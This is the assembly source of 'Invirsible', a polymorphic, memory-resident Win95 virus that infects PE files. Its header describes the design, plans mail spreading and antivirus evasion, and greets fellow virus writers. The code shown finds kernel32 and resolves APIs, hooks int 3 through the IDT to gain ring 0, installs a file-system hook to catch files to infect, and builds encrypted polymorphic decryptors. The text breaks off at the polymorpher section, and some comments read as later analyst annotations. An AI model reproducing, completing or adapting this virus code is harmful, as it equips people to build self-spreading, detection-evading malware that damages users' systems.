; Win95.Invirsible
|
||
; Bhunji
|
||
;
|
||
; proudly presents ;)
|
||
;
|
||
; Invirsible
|
||
;
|
||
; Virusinfo
|
||
; Version 2
|
||
; Size: Big, usually around 7.6k
|
||
; Infects: PE files
|
||
; Resident: Yes
|
||
; Systems; Win9x
|
||
; Polymorphic: Yes
|
||
|
||
; This is the second version of Invirsible. My goal with this virus
|
||
; is to make it as hard as possible to detect. It has one technique
|
||
; never seen in a virus before which I call the Guide technique. More
|
||
; info about this can be found at www.shadowvx.org. It carries a very
|
||
; advanced generic polymorpher. It is able to polymorph mov, add, sub
|
||
; so far but its trivial to add more instructions. The engine uses
|
||
; emulation to generate code. It is able to emulate memory and registers
|
||
; which results in code that looks very real. Coding new code to be
|
||
; polymorphed is pretty easy as it's similar to Intel asm.
|
||
|
||
; ex. mov RX1,[RX2]
|
||
; mov Random register 1, [Random register 2]
|
||
|
||
; Changes since last version
|
||
; A total rewrite of the polymorphic code. Works way better now.
|
||
; * Changed the polymorphic language to be more similar to Intel asm
|
||
; * Added memory emulation, the created code uses the end of .data segment.
|
||
; * Deleted advanced register emulation, did hardly create better code
|
||
; and was taking up lots of space.
|
||
; * Very generic, adding a new instruction needs 10 lines of data/code
|
||
; instead of 200-400 lines.
|
||
; * An optimiser that deletes the very worst code. (fx. mov eax,eax)
|
||
; * The linked list polymorpher will create a six different looking
|
||
; decryptors for the generic polymorpher.
|
||
|
||
|
||
; Some changes to the virus
|
||
; * Bugfixes. (Doesn't crash on infection :) )
|
||
; * Search for slackspace in .data segment. This space is used by the
|
||
; generated code to look more like real code.
|
||
; * Recompilation of the code before every infection to make the pointers
|
||
; point to the .data slack
|
||
|
||
; Things to be added in the future.
|
||
; * More instructions will be added to the polymorpher
|
||
; * A more powerful optimiser
|
||
; * Infect on NT too.
|
||
; * Spreading by mail
|
||
; * Infection of hlp files
|
||
; * EPO
|
||
; * Deregister the most common AV software on file but register it later in
|
||
; memory. This will not happen if the AV gives the virus its proper name.
|
||
; * A better method of upgrading the virus ala babylonia.
|
||
|
||
; And here is an example of what code the engine is able and has been
|
||
; able to generate.
|
||
|
||
; Version 1
|
||
; Version one is able to emulate/generate
|
||
; add, mov
|
||
s
|
||
; (code is taken from a generated Guide)
|
||
|
||
; mov ecx, 0Ch
|
||
; mov ebx, fs:[ecx] ; get random number
|
||
; mov edx, 0
|
||
; add edx, eax
|
||
; add eax, esi
|
||
; mov edi, 0
|
||
; add edi, 6472DAADh
|
||
; mov eax, 5A97451Fh
|
||
; mov eax, edx
|
||
; add edi, ecx
|
||
; mov ecx, 0
|
||
; add ecx, ebx
|
||
; or ecx, 8
|
||
; xor ebx, ecx ; 'and' ebx,8
|
||
; add edi, 0DCA7B4AAh
|
||
; add edi, 60E4CB5Ch
|
||
; mov edi, ebx
|
||
; add ebx, offset jumptable ; add ebx, offset jumptable
|
||
; jmp dword ptr [ebx]
|
||
|
||
|
||
; patterns
|
||
|
||
; Differences from the trash code
|
||
; fs:[register]
|
||
; or/and register,8
|
||
; jmp [register]
|
||
|
||
; The trashcode
|
||
; very few instructions
|
||
; no memory instructions
|
||
; the same amount of every emulateable instruction (normal code has more
|
||
; movs than adds for example)
|
||
; unnecessary instructions. Ex.
|
||
; mov eax, 5A97451Fh ; this is unnecessary
|
||
; mov eax, edx ; as this overwrites eax again
|
||
|
||
|
||
; Version 2
|
||
; Version two is able to emulate
|
||
; add, sub, mov, and, or, xor and memory
|
||
|
||
; Generates on average more movs than the
|
||
; adds and more adds than the other opcodes.
|
||
; Generates more registers than memory operands and
|
||
; more memory operands than numbers.
|
||
; The end result 'feels' more like regular code.
|
||
; Many many bugfixes. (There are no more bugs i hope)
|
||
|
||
; Code is taken from a generated decryptor
|
||
;
|
||
; mov edx, 8D403766h
|
||
; xor [4030D7], 1A45h ; 1a45 = virussize
|
||
; xor esi, [4030CF]
|
||
; mov [4030CF], ecx
|
||
; mov esi, 45BBA054h
|
||
; add edi, 0CCFC6B5Bh
|
||
; mov ebx, 1A45h ; first "real" instruction
|
||
; mov eax, [4030CF]
|
||
; sub edi, 1A45h
|
||
; or eax, ebx
|
||
; mov edi, 1A45h
|
||
; mov edi, 3
|
||
; add ecx, 3
|
||
; mov edx, [4030BF] ; second
|
||
; add [4030D7], eax
|
||
; mov esi, 3
|
||
|
||
; DecryptLoop:
|
||
; pusha ; will be deleted in future versions
|
||
; mov eax, 1FF5893Dh
|
||
; mov ecx, ebx
|
||
; sub eax, 0E138ABECh
|
||
; add edx, ecx ; third
|
||
; mov esi, ecx
|
||
; mov edi, ebx
|
||
; mov eax, 0D6E7BEF5h
|
||
; mov [4030CF], 5493B89Ch
|
||
; sub ecx, [4030B3]
|
||
; mov eax, 0E138ABECh
|
||
; and [4030D3], ecx
|
||
; or eax, ebx
|
||
; xor [edx], 0E138ABECh ; decrypt code
|
||
; mov [4030D7], 0E138ABECh
|
||
; popa
|
||
; sub ebx, 4 ;
|
||
; jnb DecryptLoop
|
||
; mov dword_0_4030CF, 69472C81h
|
||
; mov ecx, 0F5D970C4h
|
||
; mov edi, 1
|
||
; mov eax, dword_0_4030B7
|
||
; add ecx, 8244076Eh
|
||
|
||
|
||
|
||
|
||
; If we put the real code pieces together we get.
|
||
;
|
||
; mov ebx, 1A45h ; VirusSize
|
||
; mov edx, [4030BF] ; Where to start decrypt
|
||
; DecryptLoop:
|
||
; add edx, ecx ; third
|
||
; xor dword ptr [edx], 0E138ABECh ; decrypt code
|
||
; sub ebx, 4 ;
|
||
; jnb DecryptLoop
|
||
|
||
; The third instruction should add "Where to start" with "VirusSize" but
|
||
; as you can see it is added with ecx instead, this is because of the
|
||
; emulation. The engine knows that ecx = ebx = VirusSize so it used ecx
|
||
; instead.
|
||
|
||
; patterns
|
||
|
||
; Differences from the trash code
|
||
; pushad/popad ; easy to delete
|
||
; [Register] ; engine is only able to create [Number]
|
||
; jxx ; Engine isnt able to create jumps yet
|
||
|
||
; The trashcode
|
||
; Still too few instructions, needs push/pop, call, jmp, jxx to look at least
|
||
; something like real code.
|
||
; Memory instructions aren't able to create memory pointers with a register
|
||
; inside, eg [Number+register]. A better compiler will fix this.
|
||
; Still unnecessary instructions. Ex.
|
||
; mov eax, 0D6E7BEF5h ; this is unnecessary
|
||
; ...
|
||
; mov eax, 1FF5893Dh ; as this overwrites eax again
|
||
;
|
||
; Greetings
|
||
; (M)asmodeus. Dropper.exe has generated errors and will be closed by
|
||
; Windows :)))
|
||
; Morphi Hoppas att du får det bättre i helsingborg
|
||
; Prizzy Thanks for helping me with the bug
|
||
; Ruzz Yes, i have FINALLY finished it :)
|
||
; Kamaileon. I wish you luck with the windows programming.
|
||
; Clau Hello sister ;)
|
||
; Urgo32 Good luck with your next virus.
|
||
|
||
|
||
|
||
|
||
includelib kernel32.lib
|
||
includelib user32.lib
|
||
include c:masmincludewindows.inc
|
||
|
||
|
||
.486
|
||
.model flat, stdcall
|
||
|
||
ExitProcess PROTO ,:DWORD
|
||
MessageBoxA PROTO ,:DWORD,:DWORD,:DWORD,:DWORD
|
||
|
||
|
||
; Primes, used them in the first version for advanced register emulation,
|
||
; might be useful in the future
|
||
|
||
Prime1 equ 2
|
||
Prime2 equ 3
|
||
Prime3 equ 5
|
||
Prime4 equ 7
|
||
Prime5 equ 11
|
||
Prime6 equ 13
|
||
Prime7 equ 17
|
||
Prime8 equ 19
|
||
Prime9 equ 23
|
||
Prime10 equ 29
|
||
Prime11 equ 31
|
||
Prime12 equ 37
|
||
Prime13 equ 41
|
||
Prime14 equ 43
|
||
Prime15 equ 47
|
||
Prime16 equ 53
|
||
Prime17 equ 59
|
||
Prime18 equ 61
|
||
Prime19 equ 67
|
||
Prime20 equ 71
|
||
Prime21 equ 73
|
||
Prime22 equ 77
|
||
|
||
|
||
.data
VirusStr        db "No crack found",0

.code
; Host stub: the carrier program's entry point does nothing but exit.
; InfectedProgramOffset (see the variables after Main) is initialised to
; this label, so a first-generation run of the virus body jumps back here
; from ReturnToHost.
ProgramMain:
        push    0
        call    ExitProcess
|
||
|
||
_rsrc segment para public 'DATA' use32
|
||
assume cs:_rsrc
|
||
|
||
|
||
VirusStart:
;-----------------------------------------------------------------------
; Main -- entry point of the virus body.
; Entered with the host's return address (an address inside kernel32,
; consumed later by GetModuleHandleAndProcAddress) on top of the stack.
; Register roles: ebp = delta offset (load address minus assembled
; address); every data reference below is [Var+ebp].
; Out:   jumps to [InfectedProgramOffset] with ebp restored.
; PointerToDataSlack is defined elsewhere in the file.
;-----------------------------------------------------------------------
Main:
        mov     ebx,[esp]                       ; ebx = return address into kernel32

        push    ebp
        call    GetDelta

GetDelta:
        pop     ebp
        sub     ebp,offset GetDelta             ; ebp = delta (0 when running unrelocated in the carrier)

        mov     [Temp+ebp],ebx                  ; save the kernel32 address for GetAPIFunctions

        .if ebp!=0                              ; relocated, i.e. presumably an infected host:
                                                ; code that isn't executed in the first
                                                ; version
        mov     eax,[eax]                       ; eax is expected to have been set up by the
        mov     [InfectedProgramOffset+ebp],eax ; generated (polymorphic) prologue; save the
        .endif                                  ; host's program start for ReturnToHost

        lea     eax,BreakPoint1                 ; result unused -- overwritten on the next line
        lea     eax,[ebp+GetDelta]              ; move some address to
        mov     [PointerToDataSlack+ebp],eax    ; PTDS, doesnt matter as
                                                ; long as its a working one

        ; mov eax,fs:[0c]  (hand-encoded: address-size prefix, fs:, mov eax,moffs)
        db      67h,64h,0a1h,0ch,00h            ; get random number
        add     [RandomNumber+ebp],eax          ; (is not random on NT)

        call    GetAPIFunctions                 ; Get needed API functions

        call    FixTables                       ; clean the 'dirty' tables
                                                ; and allocate mem for the
                                                ; polymorpher

        call    CreateGuideAndDecryptor         ; Generate the polymorphic
                                                ; code

        call    GetResident                     ; intercept IFSMgr to get
                                                ; filenames to infect

ReturnToHost:

        push    [MemPtr+ebp]                    ; free allocated mem used
        call    [LocalFree+ebp]                 ; by polymorpher

        mov     eax,[InfectedProgramOffset+ebp] ; program address
        pop     ebp                             ; restore ebp

        jmp     eax                             ; jmp to program
|
||
|
||
Topic db "You can not find what you can not see.",0
|
||
db "Invirsible by Bhunji (Shadow VX)",0
|
||
|
||
VSize equ VirusEnd-VirusStart
|
||
VirusSize equ VSize
|
||
|
||
|
||
|
||
; how much stack and mem should the polymorpher use
|
||
|
||
NumberOfOffsets equ 10 ; more size = better code
|
||
; (doesnt matter right now
|
||
; because the engine isnt
|
||
; able to create jumps)
|
||
StackSize equ 100 ; (doesnt matter right now
|
||
; because the engine isnt
|
||
; able to emulate the stack)
|
||
|
||
MemorySize equ 10 ; The more size the better
|
||
; code is produced but makes
|
||
; it harder to find a file to
|
||
; infect
|
||
|
||
|
||
LinesOfTrash equ 3 ; LinesOfTrash is the
|
||
; approximate number of
|
||
; random instructions between
|
||
; every "legal" instruction
|
||
|
||
; LinesOfTrash
|
||
; Fixup instruction
|
||
; LinesOfTrash
|
||
|
||
EndValueFrecuency equ 1 ; the higher the more often
|
||
; is the EndValue chosen
|
||
; the higher the number is
|
||
; the harder is it to detect
|
||
; by looking at one
|
||
; instruction, but its easier
|
||
; to detect by looking at many
|
||
; instructions.
|
||
; 1 is a perfect value
|
||
|
||
MemPtr dd 0 ; ptr to allocated mem
|
||
ReturnAddress dd 0 ; stores the return address
|
||
; in some functions
|
||
|
||
|
||
InfectedProgramOffset dd ProgramMain ; where to jump when
|
||
; done
|
||
|
||
Temp dd 0 ; just a temporary variable
|
||
|
||
; API's the virus uses
|
||
WinFunctions:
|
||
lstrlenStr db "lstrlen",0
|
||
LocalAllocStr db "LocalAlloc",0
|
||
LocalFreeStr db "LocalFree",0
|
||
db 0
|
||
; pointers to these
|
||
Functions:
|
||
lstrlen dd ?
|
||
AllocMem dd ?
|
||
LocalFree dd ?
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; FixTables
; Resets the emulator's bookkeeping tables before the polymorpher runs and
; allocates the memory/stack emulation tables.
; In:    ebp = delta offset
; Calls: [AllocMem] (LocalAlloc, resolved by GetAPIFunctions),
;        UndefineRegistersAndMem
; Clobb: eax, ecx, esi, edi, flags
; Notes: every table entry is 5 dwords (20 bytes) -- see EaxTable.
;        The LocalAlloc result is stored without a NULL check.
;        ZeroRegStart/ZeroRegEnd and SavedOffsets are defined elsewhere.
;-----------------------------------------------------------------------
FixTables:
        ; zero the ZeroRegStart..ZeroRegEnd region
        lea     edi,[ZeroRegStart+ebp]
        mov     ecx,(ZeroRegEnd-ZeroRegStart)/4
        xor     eax,eax
        rep     stosd

        ; RandomRegs[0..Registers-1] = -1 (Uninitialized)
        lea     edi,[RandomRegs+ebp]
        mov     ecx,Registers
        dec     eax                             ; eax = -1
        rep     stosd

        ; SavedOffsets[0..NumberOfOffsets-1] = -1
        lea     edi,[SavedOffsets+ebp]
        mov     ecx,NumberOfOffsets
        rep     stosd

        ; Tables[0] = register tables (static, inside the virus body)
        lea     eax,[EaxTable+ebp]
        mov     [Tables+ebp],eax

        ; Tables[1] = memory tables, Tables[2] = stack tables: one zeroed
        ; LocalAlloc block of (MemorySize+StackSize) 20-byte entries
        mov     eax,MemorySize*20+StackSize*20

        push    eax
        push    LMEM_FIXED + LMEM_ZEROINIT
        call    [AllocMem+ebp]
        mov     [Tables+ebp+4],eax

        add     eax,MemorySize*20
        mov     [Tables+ebp+8],eax

        call    UndefineRegistersAndMem         ; mark every entry Writeable+Undefined

        ; Seed the memory tables from Mem1Table: first byte = entry count,
        ; then per entry one index byte followed by a 20-byte table.
        xor     eax,eax
        lea     esi,[Mem1Table+ebp]
        mov     edi,[Tables+ebp+4]
        lodsb                                   ; al = number of predefined entries

        mov     ecx,eax
PredefinedMem:
        lodsb                                   ; al = destination table index
        push    edi
        imul    eax,eax,20                      ; byte offset of that entry
        lea     edi,[edi+eax]
        push    ecx
        mov     ecx,5
        rep     movsd                           ; copy the 5-dword entry
        pop     ecx
        pop     edi
        loop    PredefinedMem

        ret
|
||
|
||
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; UndefineRegistersAndMem
; Marks every register table and every memory/stack table entry as
; Writeable+Undefined by writing the "Information" dword (5th dword of
; each 20-byte entry).  The value/reg fields are left untouched.
; In:    ebp = delta; [Tables+4] = memory table base (set by FixTables)
; Clobb: eax, ecx, edi, flags
;-----------------------------------------------------------------------
UndefineRegistersAndMem:
        lea     edi,[EaxTable+ebp+4*4]          ; -> EaxInformation
        mov     ecx,Registers
        mov     eax,Writeable+Undefined

SetOpcodeInfo1:
        stosd
        add     edi,4*4                         ; stride 20: next entry's Information dword
        loop    SetOpcodeInfo1

        mov     edi,[Tables+ebp+4]
        add     edi,4*4
        mov     ecx,MemorySize+StackSize        ; memory and stack tables are contiguous
        mov     eax,Writeable+Undefined

SetOpcodeInfo2:
        stosd
        add     edi,4*4
        loop    SetOpcodeInfo2

        ret
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
GetModuleHandle   dd 0          ; despite the name: the kernel32 image base
                                ; returned by GetModuleHandleAndProcAddress
GetProcAddress    dd 0          ; address of kernel32!GetProcAddress
GetProcAddressStr db "GetProcAddress",0

;-----------------------------------------------------------------------
; GetAPIFunctions
; Resolves the names listed at WinFunctions (lstrlen, LocalAlloc,
; LocalFree) into the parallel dword table at Functions via GetProcAddress.
; In:    ebp = delta; [Temp] = an address inside kernel32 (saved by Main)
; Out:   [GetModuleHandle], [GetProcAddress], [Functions..] filled
; Clobb: eax, ebx, ecx, edx, esi, edi, flags
; Note:  the first name resolved is "lstrlen", and it is stored at
;        Functions+0 before [lstrlen+ebp] is called below -- the order of
;        the WinFunctions list therefore matters.
;-----------------------------------------------------------------------
GetAPIFunctions:
        mov     eax,[Temp+ebp]

        call    GetModuleHandleAndProcAddress   ; eax = kernel32 base, ebx = GetProcAddress

        mov     [GetModuleHandle+ebp],eax
        mov     [GetProcAddress+ebp],ebx

        xor     edx,edx                         ; redundant: overwritten by the lea below
        lea     edx,[WinFunctions+ebp]          ; edx -> current name
        xor     ecx,ecx                         ; ecx = byte offset into Functions

CopyWinApiFunctions:
        push    edx                             ; save name pointer
        push    ecx                             ; save table offset

        push    edx                             ; arg for the lstrlen call below
        push    edx                             ; lpProcName
        push    [GetModuleHandle+ebp]           ; hModule
        call    [GetProcAddress+ebp]

        mov     ecx,[esp+4]                     ; reload the saved table offset
        mov     [Functions+ebp+ecx],eax         ; store the resolved address

        call    [lstrlen+ebp]                   ; eax = length of the name just resolved
        pop     ecx
        pop     edx
        add     edx,eax
        add     ecx,4
        inc     edx                             ; skip the terminating 0

        cmp     byte ptr [edx],0                ; a second 0 ends the list
        jnz     CopyWinApiFunctions
NoMoreApis:
        ret
|
||
|
||
;-----------------------------------------------------------------------
; GetModuleHandleAndProcAddress
; Locates the kernel32 image base by scanning downwards in 1000h steps
; from an address inside kernel32, then walks its export directory by
; name to find GetProcAddress.
; Input
;   eax = somewhere in kernel
; Returns
;   eax = kernel32 image base (the "MZ" header)
;   ebx = GetProcAddress address
; Clobb: ecx, edx, esi, edi, flags
; Notes: the page loop reads each candidate page without checking that it
;        is mapped; an unmapped gap below the image would fault.
;        The export-directory offsets used below (12 = Name,
;        28 = AddressOfFunctions, 32 = AddressOfNames,
;        36 = AddressOfNameOrdinals) are the standard PE layout.
;-----------------------------------------------------------------------
GetModuleHandleAndProcAddress:
        and     eax,0fffff000h                  ; even 1000h something

FindKernelEntry:
        sub     eax,1000h                       ; previous page
        cmp     word ptr [eax],'ZM'             ; "MZ" DOS header?
        jnz     FindKernelEntry

        mov     ebx,[eax+3ch]                   ; e_lfanew

        cmp     word ptr [ebx+eax], 'EP'        ; "PE" signature?
        jne     FindKernelEntry
        mov     ebx,[eax+120+ebx]               ; export directory RVA
        add     ebx,eax                         ; ebx -> Export table

        mov     ecx,[ebx+12]                    ; ecx -> dll name

        cmp     dword ptr [ecx+eax],'NREK'      ; name starts with "KERN"?
        jz      FindGetProcAddress
        jmp     FindKernelEntry

; We can now be sure that eax points to the kernel
FindGetProcAddress:
        lea     edi,[GetProcAddressStr+ebp]

        mov     edx,[ebx+32]                    ; AddressOfNames (RVA)

FindFunction:
        add     edx,4                           ; next name entry (entry 0 is never compared)
        mov     ecx,15                          ; length of GetProcAddress,0
        mov     esi,[edx+eax]
        push    edi
        add     esi,eax                         ; esi -> exported name
        repz    cmpsb
        pop     edi
        jne     FindFunction

        sub     edx,[ebx+32]                    ; edx = index*4
        shr     edx,1                           ; edx = index*2 (byte offset into the 16-bit ordinal array)

        lea     esi,[edx+eax]
        xor     ecx,ecx
        add     esi,[ebx+36]                    ; esi = base+ordinals+ordnr

        mov     cx,word ptr [esi]               ; ecx = ordinal
        shl     ecx,2                           ; ecx = ordinal*4
        add     ecx,[ebx+28]                    ; ecx = ordinal*4+func tbl addr

        mov     ebx,[ecx+eax]                   ; ebx = function RVA
        add     ebx,eax                         ; ebx = function addr in mem

        ret
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
Encryptor dd 0                  ; -> generated encryptor text (set by CreateGuideAndDecryptor)

;-----------------------------------------------------------------------
; GetResident
; Switches to ring 0 by temporarily pointing IDT entry 3 (int 3) at
; Ring0Code and executing int 3; Ring0Code installs the resident part and
; returns with iretd.  Skipped when the 4-byte marker '.K3Y' is already
; present at kernel32 base + 6Ch (Ring0Code writes it), i.e. when already
; resident.
; In:    ebp = delta; [GetModuleHandle] = kernel32 base
; Clobb: eax, ebx, esi, flags (plus whatever Ring0Code leaves behind)
; Note:  this relies on Win9x leaving the IDT writable from ring 3.  From
;        a detection standpoint, a user-mode sidt followed by a write into
;        a gate descriptor is the observable event here.
;-----------------------------------------------------------------------
GetResident:
        mov     eax,[GetModuleHandle+ebp]
        add     eax,6ch
        mov     ebx,'.K3Y'
        cmp     [eax],ebx                       ; residency marker present?

        jz      DontGoRing0

        sub     esp,8
        sidt    [esp]                           ; get interrupt table (IDTR into the stack slot)

        ; hook int 3 to get ring 0
        mov     esi,[esp+2]                     ; esi = IDT base
        add     esi, 3*8                        ; pointer to int 3 descriptor
        mov     ebx, [esi+4]                    ; high dword: offset bits 31..16 in its top word

        mov     bx,word ptr [esi]               ; ebx = old pointer (offset high:low)
        lea     eax,[Ring0Code+ebp]             ; eax = new pointer
        mov     word ptr [esi],ax               ; move new pointer to int 3
        shr     eax,16
        mov     word ptr [esi+6], ax

        pushad

        int     3                               ; get into ring 0 (returns via Ring0Code's iretd)
        popad
        mov     [esi],bx                        ; return old pointer again
        shr     ebx,16
        mov     [esi+6],bx
        add     esp,8

DontGoRing0:
        ret
|
||
|
||
|
||
|
||
|
||
; ---------------------------------------
|
||
; -------------------------------- Ring 0
|
||
; ---------------------------------------
|
||
|
||
|
||
;-----------------------------------------------------------------------
; Ring0Code -- runs as the int 3 handler installed by GetResident, i.e. at
; ring 0, and returns to the caller with iretd.  Steps, as visible below:
;   1. write the '.K3Y' residency marker at kernel32 base + 6Ch
;   2. allocate memory through the vxd helper (R0_AllocMem) sized for
;      guide + decryptor + special variables + 2x the virus body + 20
;   3. copy the generated guide/decryptor there and rebase GuidePos,
;      DecryptorPos and MemoryTable
;   4. lay out the virtual data segment and seed it from Mem1Table
;   5. copy the virus body and encrypt it in place with the generated
;      encryptor (Compile, then call esi)
;   6. copy the resident code and register it via InstallFileSystemAPIhook
; In:    ebp = delta (unchanged by the int 3)
; Clobb: everything; the caller wrapped the int 3 in pushad/popad
; vxd, R0_AllocMem, InstallFileSystemAPIhook, ResidentcodeStart/End,
; BasePtr, OldAPIFunction, BreakPoint, Compile, GuidePos, DecryptorPos,
; MemoryTable, VirtualDataSegment and VirusInRing0Mem are defined
; elsewhere in the file.
;-----------------------------------------------------------------------
Ring0Code:
        mov     eax,[GetModuleHandle+ebp]
        add     eax,6ch
        mov     ebx,'.K3Y'
        mov     [eax],ebx                       ; set the residency marker
        mov     ebx,[eax+8]
        mov     [eax+4],ebx                     ; copies the dword at +8 to +4 (purpose not visible here)

        mov     eax,[MemoryTable+ebp]
        sub     eax,[GuidePos+ebp]              ; eax = size of guide + decryptor
        push    eax

        add     eax,(MemorySize+1)*8
        push    eax                             ; push guide + decrypt size
                                                ; + special variables
        add     eax,(VirusEnd-VirusStart)*2+20

        ; allocate mem
        push    eax
        push    R0_AllocMem
        mov     edi,ebp
        call    vxd
        pop     ecx                             ; (stack balance of the vxd call is not visible here)
        test    eax,eax
        jz      ErrorRing0                      ; allocation failed

        ; Copy guide and decryptor to ring 0 mem

        pop     ecx                             ; ecx = guide + decrypt size
                                                ; + special variables
        mov     esi,[GuidePos+ebp]
        mov     edi,eax
        mov     ebx,eax
        xchg    ebx,[GuidePos+ebp]              ; eax = new guide pos
                                                ; ebx = old guide pos
        pop     edx                             ; edx = size of guide+decrypt
        add     edx,eax                         ; edx = new memory pos
        mov     [MemoryTable+ebp],edx

        sub     eax,ebx                         ; difference in mem
        add     [DecryptorPos+ebp],eax          ; add to get new pos

        rep     movsb                           ; copy polycode to ring 0

        ; zero the (MemorySize+1) qwords that follow it
        mov     edi,edx
        mov     ecx,(MemorySize+1)*(8/4)
        xor     eax,eax
        rep     stosd

        add     edx,MemorySize*4+4
        mov     [VirtualDataSegment+ebp],edx

        pushad

        mov     eax,[VirtualDataSegment+ebp]    ; pointer to virtual data
                                                ; segment

        lea     edx,[Mem1Table+ebp]
        movzx   ecx,byte ptr [edx]              ; how much data does the
                                                ; decryptor and guide need
                                                ; predefined
        inc     edx

CopyDataToVirtualDataSegment:
        movzx   ebx,byte ptr [edx]              ; where in datasegment should
                                                ; we write the data
        shl     ebx,2                           ; dword index -> byte offset
        push    dword ptr [edx+1]               ; push the data to write
        pop     [eax+ebx]                       ; write it to virtual data seg
        add     edx,1+5*4                       ; point to next data block
        loop    CopyDataToVirtualDataSegment

        popad

        mov     [VirusInRing0Mem+ebp],edi
        mov     ebx,edi                         ; ebx -> the copy of the virus body

        lea     esi, [ebp+VirusStart]
        mov     ecx, VirusSize
        rep     movsb                           ; copy virus to ring 0
        xor     eax,eax

        stosd                                   ; two zero dwords after the body
        stosd

        ; encrypt virus in memory
        pushad
        mov     esi,[Encryptor+ebp]
        push    ebx                             ; pointer to virus in ring0
        mov     eax,esp
        push    eax                             ; pointer to pointer
        push    eax
        push    eax
        push    eax
        mov     [PointerToDataSlack+ebp],esp    ; all special variables
                                                ; points to pointer to
                                                ; virus in ring 0
        call    Compile                         ; compile the encryptor text ...

        call    esi                             ; ... and run it over the copy

        add     esp,5*4

        popad

        ; copy residentcode to mem
        push    edi

        lea     esi, [ebp+ResidentcodeStart]
        mov     ecx, ResidentcodeEnd-ResidentcodeStart
        rep     movsb

        ; hook API function
        ; edi is on stack
        push    InstallFileSystemAPIhook
        mov     edi,ebp
        call    vxd

        pop     edi                             ; 0 edi left on stack
        sub     edi,ResidentcodeStart           ; edi = delta of the resident copy
        mov     [edi+BasePtr+1],edi             ; patch the resident code's base pointer
        mov     [edi+OldAPIFunction],eax        ; eax = vxd result, presumably the previous hook
BreakPoint1:

        lea     eax,[edi+BreakPoint]            ; leftover: eax is restored by the
        lea     eax,[edi+BreakPoint]            ; caller's popad after the iretd
        iretd

ErrorRing0:
        pop     eax                             ; NOTE(review): only one of the two sizes pushed
        xor     eax,eax                         ; above is popped here -- verify against vxd
        iretd
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; CreateGuideAndDecryptor
; Generates, in a 1 MB LocalAlloc buffer (kept in MemPtr, freed by
; ReturnToHost), three pieces of polymorphic output:
;   - the guide     (template Guide)     -> GuidePos / GuideSize
;   - the decryptor (template Decryptor) -> DecryptorPos / DecryptorSize,
;     MemoryTable = end of the decryptor output
;   - the encryptor: the decryptor's intermediate text re-mutated with all
;     'trsh' counts zeroed and its one "[Rx]," memory-write instruction
;     inverted (add <-> sub, xor kept)  -> Encryptor
; In:    ebp = delta; [AllocMem] = LocalAlloc
; Clobb: eax, ecx, edx, esi, edi, flags (plus what the callees clobber)
; GuidePos, GuideSize, DecryptorPos, DecryptorSize, MemoryTable and
; HowMuchTrash are defined elsewhere in the file.
;-----------------------------------------------------------------------
CreateGuideAndDecryptor:
        push    1024*1024
        push    LMEM_FIXED + LMEM_ZEROINIT
        call    [AllocMem+ebp]

        mov     [MemPtr+ebp],eax                ; stored without a NULL check

        mov     edi,eax                         ; edi = output buffer
        lea     esi,[Guide+ebp]                 ; esi = guide template

        call    LinkedListPolymorpher           ; expand the template tree into text
        call    Polymorph                       ; create Guide

        mov     [GuidePos+ebp],esi
        mov     [GuideSize+ebp],eax

        add     edi,32                          ; gap before the next output

        lea     esi,[Decryptor+ebp]

        call    LinkedListPolymorpher
        push    esi                             ; keep the decryptor text for the encryptor pass

        call    Polymorph                       ; create Decryptor

        mov     [DecryptorPos+ebp],esi
        mov     [MemoryTable+ebp],edi

        mov     [DecryptorSize+ebp],eax

        call    UndefineRegistersAndMem         ; fresh emulator state for the encryptor pass

        mov     [HowMuchTrash+ebp],0
        pop     esi                             ; esi = decryptor text

        ; Walk the text and zero the count byte of every 'trsh' record so
        ; the encryptor is generated without filler.  The text ends with two
        ; consecutive zero dwords (see TablePolymorpher).
        pushad
        mov     edi,esi
        mov     eax,Op_trash
        bswap   eax                             ; match the byte order used in the text
        xor     ecx,ecx                         ; ecx = 1 once a zero dword has been seen
        xor     edx,edx
FindTrashInstruction:
        inc     edi
        cmp     [edi],edx                       ; zero dword?
        jz      EndOfTrashInstructions
        xor     ecx,ecx                         ; non-zero: reset the end-marker state
        cmp     [edi],eax                       ; 'trsh' record?
        jnz     FindTrashInstruction
        add     edi,4
        push    eax
        xor     eax,eax
        stosb                                   ; count byte := 0
        pop     eax
        jmp     FindTrashInstruction

EndOfTrashInstructions:
        test    ecx,ecx
        jnz     ReallyEnd                       ; second zero dword in a row: done
        inc     ecx
        add     edi,3                           ; skip the rest of the first zero dword
        jmp     FindTrashInstruction

ReallyEnd:
        popad
        add     edi,eax                         ; output after the compiled decryptor (eax = DecryptorSize)
        call    MutateCode                      ; Generic polymorphing: esi -> encryptor text

        ; Find the instruction with a "[Rx]," destination -- the one that
        ; touches the encrypted data -- and invert its opcode.
        mov     ecx,edi
        sub     ecx,esi
        shr     ecx,1                           ; word count for scasw
        mov     edi,esi

FindDecryptInstruction:
        mov     eax,'R['
        repnz   scasw                           ; find [R
        inc     edi
        mov     ax,word ptr [edi]
        cmp     eax,',]'                        ; is this [Rx],
        jnz     FindDecryptInstruction          ; if not, continue looking

        and     edi,0fffffff0h                  ; back up to the record's opcode; assumes each
                                                ; emitted record starts on a 16-byte boundary
                                                ; (see the and edi,0fffffff0h in the Parse handlers)
        mov     eax,[edi]
        bswap   eax

        .if eax==Op_xor                         ; xor is its own inverse
        jmp     CompileEncryptor

        .elseif eax==Op_add                     ; add -> sub
        mov     eax,Op_sub
        bswap   eax
        stosd
        jmp     CompileEncryptor

        .else                                   ; sub -> add
        mov     eax,Op_add
        bswap   eax
        stosd
        jmp     CompileEncryptor

        .endif

CompileEncryptor:
        mov     [Encryptor+ebp],esi             ; compiled later, at ring 0 (Ring0Code)

        ret
|
||
|
||
|
||
|
||
|
||
; ---------------------------------------------------
|
||
; --------------------------- The generic polymorpher
|
||
; ---------------------------------------------------
|
||
|
||
; esi = Data to polymorph
|
||
; edi = where to put the created data
|
||
|
||
; Returns
|
||
; esi = start of created data
|
||
; edi = end of created data/start of created code
